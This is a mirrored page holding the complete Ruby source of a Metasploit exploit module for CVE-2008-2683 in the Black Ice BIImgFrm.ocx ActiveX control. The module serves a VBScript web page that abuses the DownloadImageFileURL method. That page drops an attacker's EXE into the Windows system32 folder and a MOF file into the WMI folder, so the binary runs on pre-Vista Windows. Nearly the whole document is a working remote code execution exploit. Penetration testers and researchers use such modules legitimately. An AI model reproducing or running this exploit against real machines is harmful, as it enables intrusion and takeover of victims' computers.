Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
63566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::WbemExec

12


13
  # include Msf::Exploit::Remote::BrowserAutopwn

14
  # autopwn_info({

15
  #  :os_name => OperatingSystems::Match::WINDOWS,

16
  #  :ua_name    => HttpClients::IE,

17
  #  :javascript => true,

18
  #  :rank       => NormalRanking,

19
  #  :classid    => "{79956462-F148-497F-B247-DF35A095F80B}",

20
  #  :method     => "DownloadImageFileURL",

21
  # })

22


23
  def initialize(info = {})

24
    super(

25
      update_info(

26
        info,

27
        'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',

28
        'Description' => %q{

29
          This module allows remote attackers to place arbitrary files on a users file system

30
          by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX

31
          Control (BIImgFrm.ocx 12.0.0.0).  Code execution can be achieved by first uploading the

32
          payload to the remote machine, and then upload another mof file, which enables Windows

33
          Management Instrumentation service to execute the binary. Please note that this module

34
          currently only works for Windows before Vista.  Also, a similar issue is reported in

35
          BIDIB.ocx (10.9.3.0) within the Barcode SDK.

36
        },

37
        'License' => MSF_LICENSE,

38
        'Author' => [

39
          'shinnai', # original discovery

40
          'mr_me <steventhomasseeley[at]gmail.com>', # msf

41
          'sinn3r' # wbemexec tekniq

42
        ],

43
        'References' => [

44
          [ 'CVE', '2008-2683'],

45
          [ 'OSVDB', '46007'],

46
          [ 'BID', '29577'],

47
          [ 'EDB', '5750' ],

48
        ],

49
        'DefaultOptions' => {

50
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

51
        },

52
        'Payload' => {

53
          'Space' => 2048,

54
          'StackAdjustment' => -3500,

55
        },

56
        'Platform' => 'win',

57
        'Targets' => [

58
          # Windows before Vista

59
          [ 'Automatic', {} ],

60
        ],

61
        'DefaultTarget' => 0,

62
        'DisclosureDate' => '2008-06-05',

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70
  end

71


72
  def autofilter

73
    false

74
  end

75


76
  def check_dependencies

77
    use_zlib

78
  end

79


80
  def on_request_uri(cli, request)

81
    if request.uri.match(/\.EXE/)

82
      print_status("Sending EXE payload...")

83
      send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })

84
      return

85
    elsif request.uri.match(/\.MOF/)

86
      return if @mof_name == nil or @payload_name == nil

87


88
      print_status("Generating mof")

89
      mof = generate_mof(@mof_name, @payload_name)

90
      print_status("Sending MOF")

91
      send_response(cli, mof, { 'Content-Type' => 'application/octet-stream' })

92
      return

93
    end

94


95
    url = get_uri(cli)

96
    url += '/' unless url.end_with?('/')

97


98
    # VBScript variables

99
    clsid = "79956462-F148-497F-B247-DF35A095F80B"

100
    method = "DownloadImageFileURL"

101
    blackice = rand_text_alpha(rand(100) + 1) # BlackIce object ID

102
    @payload_name = rand_text_alpha(rand(10) + 1) + ".EXE" # Payload name

103
    payload_vbs_url_name = rand_text_alpha(5) # Payload's vbs var name

104
    payload_vbs_lpath = rand_text_alpha(6) # Payload's lpath var name

105
    @mof_name = rand_text_alpha(rand(10) + 1) + ".MOF" # MOF path on victim machine

106
    mof_vbs_url_name = rand_text_alpha(5) # MOF's vbs var name

107
    mof_vbs_lpath = rand_text_alpha(6) # MOF's lpath var name

108
    sub_name = rand_text_alpha(rand(10) + 1) # Subroutine name

109


110
    # Slow connection friendly: We will wait for 4 seconds before we try to execute our payload

111
    # This delay seems necessary before calling mof, otherwise we end up interrupting downloading

112
    # our payload

113
    content = <<-EOS

114
    <html>

115
    <object classid='clsid:#{clsid}' id='#{blackice}' ></object>

116
    <script language='vbscript'>

117
    sub #{sub_name}

118
    #{mof_vbs_url_name} = "#{url}#{@mof_name}"

119
    #{mof_vbs_lpath} = "C:\\WINDOWS\\system32\\wbem\\mof\\#{@mof_name}"

120
    #{blackice}.#{method} #{mof_vbs_url_name}, #{mof_vbs_lpath}

121
    end sub

122


123
    #{payload_vbs_url_name} = "#{url}#{@payload_name}"

124
    #{payload_vbs_lpath} = "C:\\WINDOWS\\system32\\#{@payload_name}"

125
    #{blackice}.#{method} #{payload_vbs_url_name}, #{payload_vbs_lpath}

126
    setTimeout "#{sub_name}()", 4000

127
    </script>

128
    </html>

129
    EOS

130


131
    # Clear the extra tabs

132
    content = content.gsub(/^ {4}/, '')

133


134
    print_status("Sending exploit HTML")

135
    send_response_html(cli, content)

136
    handler(cli)

137
  end

138


139
  def exploit

140
    @payload = generate_payload_exe

141
    super

142
  end

143
end

144


145